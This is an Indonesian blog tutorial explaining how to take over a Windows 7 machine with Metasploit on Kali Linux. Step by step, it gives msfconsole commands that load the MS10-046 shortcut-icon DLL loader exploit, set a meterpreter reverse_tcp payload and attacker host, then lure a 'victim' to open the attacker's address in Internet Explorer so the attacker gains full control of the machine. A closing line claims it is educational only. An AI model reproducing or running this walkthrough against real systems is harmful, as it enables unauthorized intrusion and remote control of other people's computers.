Cara Me-remote Windows 7 Menggunakan Metasploit di kali Linux



 Hallo sobat cyber kali ini saya akan menunjukan bagaimana cara nge-hack OS windows 7 menggunakan metasploit di kali linux, Mengekspolitasi kerentangan jendela untuk masuk kedalam sistem dengan username dan password menggunakan metasploit.

Sebelum nge-hack, Anda ingin mengetahui karangka metasploit. jika anda baru di dunia hacking anda harus mengetahui itu, bagaimana anda mau menjadi elit kalo hal itu anda tidak tau.??
Metasploit-porject adalah proyek keamanan komputer yang menyediakan informasi tentang kerentangan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan IDS.

yang paling terkenal  sub-proyek adalah open source Metasploit Framework, alat untuk mengembangakn dan melaksanakan memanfaatkan code terhadap mesin target jarak jau, sub-proyek lainya termasuk database Opcode shellcode dan terkait dengan penilitian perusahaan yang besar didalam dunia maya

Dan metasploit projeck terkenal alat anti-forensic dan penggelapan, dari beberapa banyaknya yang digabung kedalam Metasploit Framework

Persyaratan :
  • install Metasploit di kali linux 
  • Rokok Dan Kopinya bous
  • dan korek api biar bisa dinyalain rokoknya bos
Gak usah banyak bacot lagi, langsungke TKP
perhatitikan dengan teliti..............

 1. Langkah pertama buka terminal kesayangan anda dan ketikan msfconsole. 

 

2. Setelah msfconsule terbuka, ketikan perintah ini untuk mencari module 
 #msf > expolit/windows/browser/ms 10_046_shortcut_icon_dllloader.


3. Setelah itu kitikan #msf > set payload windows/meterpreter/reverse_tcp


4. Sekarang waktunya untuk melakukan beberapa konfigurasi untuk exploit/payload yang baru saja kita    atur, caranya kitikan perintah #msf > show options, (ingat anda harus mendapatkan dibawa output yang defaul.)


5. Sekarang kita harus mangatur hots local untuk konfigurasi, caranya ketik
   #msf > set SRVHOST 192.168.31.20 (IP yang sedang kita gunakan)


6.Setelah kita mengatur hots local konfigurasinya , sekarang ketik
#msf > set LHOST 192.168.31.20 (IP yang sedang kita gunakan)


7.Sekarang kita periksa apakah konfigurasi diterapkan, ketikan #msf > show options.


8.Sekarang kita star exploit, kitikan perintah #msf > exploit


9.Setelah di eksekukusi kita harus "Server Started" (perlu di ingat pastikan bahwa server tidak               berjalan layanan web pada port 80) dan pada komputer korban cukup membuka Internet Explorer dan membuka http//192.168.31.20 (IP yang sudah kita buat tadi) maka kumputernya udah kita kuasai, artinya kita sudah berhasil bro ^_^ , liat gambar dibawah ini.


CATATAN : akan memberikan sebuah pop-up yang meminta izin, clik ALLOW dan pastikan anda tidak memiliki anti virus yang, Anda dapat memeriksa jumlah sesi yang terhubung sukses dengan menjalankan perintah session -i 1 , liat gambar di bawah ini.


Setelah linux sudah terhubung dengan isi didalam sistem, kita sudah memiliki kontrol sepenuhnya jadi silakan anda kembangkan sendiri.

PERHATIAN : tutorial ini hanya untuk tujan pendidikan saja

No comments:

Post a Comment